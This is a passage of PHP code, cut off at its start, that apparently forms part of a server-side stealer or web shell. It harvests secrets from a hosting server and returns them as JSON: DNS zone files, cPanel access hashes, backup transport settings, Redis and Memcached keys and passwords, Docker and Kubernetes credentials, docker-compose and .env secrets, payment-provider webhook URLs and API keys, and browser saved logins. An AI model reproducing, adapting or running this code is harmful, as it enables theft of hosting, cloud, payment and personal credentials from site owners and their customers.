200)break 2; }}foreach(glob('/var/named/*.db') ?: [] as $f){ $c=@file_get_contents($f);if($c) $r['DNS.'.basename($f)]=substr($c,0,3000); if(count($r)>250)break;}foreach(glob('/home/*/.accesshash') as $f){ $c=@file_get_contents($f);if($c){ $u=basename(dirname($f)); $r['ACCESSHASH.'.$u]=trim($c); }}foreach(glob('/var/cpanel/backups/transport/*') ?: [] as $f){ $c=@file_get_contents($f);if($c) $r['BACKUP_TRANSPORT.'.basename($f)]=substr($c,0,2000);}$redis_sock=['/var/run/redis/redis.sock','/tmp/redis.sock'];$redis_host='127.0.0.1';$redis_port=6379;try{ $rc=@fsockopen($redis_host,$redis_port,$en,$es,2); if($rc){ fwrite($rc,"KEYS *session*\r\nKEYS *token*\r\nKEYS *auth*\r\nKEYS *pass*\r\n"); stream_set_timeout($rc,2); $rd=stream_get_contents($rc); if($rd&&strlen($rd)>5)$r['REDIS.keys']=substr($rd,0,5000); fwrite($rc,"CONFIG GET requirepass\r\n"); $rp=stream_get_contents($rc); if($rp&&strpos($rp,'$')!==false)$r['REDIS.config']=substr($rp,0,500); fclose($rc); }}catch(Exception $e){}try{ $mc=@fsockopen('127.0.0.1',11211,$en,$es,2); if($mc){ fwrite($mc,"stats\r\n"); stream_set_timeout($mc,2); $ms=stream_get_contents($mc); if($ms)$r['MEMCACHED.stats']=substr($ms,0,3000); fwrite($mc,"stats cachedump 1 100\r\n"); $md=stream_get_contents($mc); if($md)$r['MEMCACHED.keys']=substr($md,0,5000); fclose($mc); }}catch(Exception $e){}$docker_paths=['/root/.docker/config.json','/home/*/.docker/config.json','/var/run/secrets/kubernetes.io/serviceaccount/token','/etc/kubernetes/admin.conf','/root/.kube/config'];foreach($docker_paths as $dp){ foreach(glob($dp)?:[$dp] as $f){ $c=@file_get_contents($f);if($c){ $key='DOCKER.'.basename(dirname($f)).'.'.basename($f); $r[$key]=substr($c,0,3000); } }}foreach(glob('/home/*/docker-compose.yml') ?: [] as $f){ $c=@file_get_contents($f);if($c&&preg_match('/password|secret|key|token/i',$c)) $r['DOCKER_COMPOSE.'.basename(dirname($f))]=substr($c,0,3000);}foreach(glob('/home/*/.env.docker') ?: [] as $f){ $c=@file_get_contents($f);if($c)$r['DOCKER_ENV.'.basename(dirname($f))]=substr($c,0,2000);}$webhook_patterns=['stripe','paypal','braintree','square','mollie','razorpay','coinbase','paddle'];foreach(glob('/home/*/public_html/{*.php,*.json,config/*.php,app/config/*.php}',GLOB_BRACE) ?: [] as $f){ $c=@file_get_contents($f);if(!$c||strlen($c)>500000)continue; foreach($webhook_patterns as $wp){ if(stripos($c,$wp)!==false){ preg_match_all('/(https?:\/\/[^\s\'\"]+(?:webhook|hook|notify|ipn|callback)[^\s\'\"]*)/i',$c,$m); foreach($m[1] as $url)$r['WEBHOOK.'.basename(dirname($f)).'.'.$wp]=$url; preg_match_all('/(?:secret|key|token|sig)\w*\s*[=:]\s*[\'\"]([^\'\"]{20,})[\'\"]/',$c,$m2); foreach($m2[1] as $v)$r['PAY_KEY.'.basename(dirname($f)).'.'.$wp]=$v; break; } } if(count($r)>300)break;}$browser_paths=['/root/.config/google-chrome/Default/Login Data','/root/.mozilla/firefox/*.default*/logins.json','/home/*/.config/google-chrome/Default/Login Data','/home/*/.mozilla/firefox/*.default*/logins.json'];foreach($browser_paths as $bp){ foreach(glob($bp) ?: [] as $f){ if(strpos($f,'Login Data')!==false){ $r['BROWSER.chrome.'.basename(dirname(dirname(dirname($f))))]='[SQLite DB - '.filesize($f).' bytes at '.$f.']'; }elseif(strpos($f,'logins.json')!==false){ $c=@file_get_contents($f);if($c)$r['BROWSER.firefox.'.basename(dirname($f))]=substr($c,0,5000); } }}echo json_encode(['ok'=>1,'data'=>$r,'count'=>count($r)]);?>